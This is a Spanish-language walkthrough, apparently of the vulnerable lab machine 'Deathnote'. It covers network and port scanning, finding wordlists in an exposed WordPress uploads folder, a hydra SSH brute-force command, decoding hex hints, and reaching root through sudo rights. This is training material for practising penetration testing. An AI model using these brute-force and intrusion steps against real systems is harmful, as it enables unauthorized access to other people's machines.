Máquina: Deathnote
SO: Linux
Dificultad: Easy
Descarga


img

1. Pillamos la ip objetivo en la red.

sudo arp-scan -l

img

2. Escaneo puertos y servicios abiertos.

sudo nmap -p- --open -T5 -sS -sCV -Pn -n --min-rate=5000 192.168.1.60 -oN savescan

img

3. Visito la web apache y me redirige a un dominio que no se puede resolver.

http://192.168.1.60

img img

4. Para solucionar este error añadimos el dominio en el hosts.

nano /etc/hosts

192.168.1.60 deathnote.vuln

img

- Ya nos resuelve el dominio

img

5. Veo la pista(hint), pone que tenemos que encontrar un archivo.

http://deathnote.vuln/wordpress/index.php/hint/

img

6. Mas abajo podemos ir al comentario de L.

img img

7. Vemos el codigo fuente y filtramos por notes, lo tenemos.

img

8. Voy al link pero no funciona.

http://deathnote.vuln/wordpress/wp-content/uploads/notes.txt

img

9. Se me da por eliminar el nombre del archivo y tengo un directorio, busco el archivo.

http://deathnote.vuln/wordpress/wp-content/uploads/

img img img

10. Reviso el contenido de cada archivo.

10.1- En notes tenemos una lista de palabras

http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt

img

10.2- En user tenemos otra lista

img

11. Me descargo todo estos archivos de forma recursiva.

wget -r --no-parent --reject "index.html*" -q http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/

ls

img

12. Revisando la carpeta encuentro un fichero que me da una pista.

cd deathnote.vuln

ls

cat robots.txt

img

13. Analizando la imagen.

13.1- Voy a la imagen en la web

http://deathnote.vuln/important.jpg

img

13.2- Veo la data en la imagen, me da mas detalles

curl http://deathnote.vuln/important.jpg

img

13.3- Otra opcion es descargar la imagen y leer la data

wget http://deathnote.vuln/important.jpg -q

cat important.jpg

img

14. Haciendo fuerza bruta al ssh.

14.1- Me ubico donde los archivos notes y user

cd deathnote.vuln/wordpress/wp-content/uploads/2021/07

ls

img

14.2- Hago fuerza bruta para tener las credenciales

hydra -L user.txt -P notes.txt ssh://192.168.1.60

img

14.3- Accedo por ssh como usuario L

ssh l@192.168.1.60

img

15. Despues de indagar mucho, encuentro una carpeta en opt.

cd /opt

ls

cd L

ls

find

img

16. Viendo el contenido de los archivos.

16.1- Leendo case-file.txt

cat Kira-case/case-file.txt

img

16.2- Leendo case.wav y hint

cat fake-notebook-rule/case.wav

cat fake-notebook-rule/hint

img

17. Al parecer tenemos un texto en hexadecimal y nos dice que usemos Cyberchef.

17.1- Pego el hex y por debajo me detecta para decodificar

img

17.2- Hago click y me muestra el texto decodificado

img

18. Accedo por ssh como kira.

ssh kira@192.168.1.60

img

19. Encuentro un archivo, sigo pasos anteriores con cyberchef.

19.1- Leo el archivo

ls

cat Kira.txt

img

19.2- Lo analizo con cyberchef

img

- Estos directorios ya los vimos, asi que no hace falta mas nada

20. Obteniendo superusuario.

20.1- Veo mis permisos de sudo ingresando mi contraseña

sudo -l

img

20.2- Ya que tengo permiso general, accedo como root

img


Finalizado.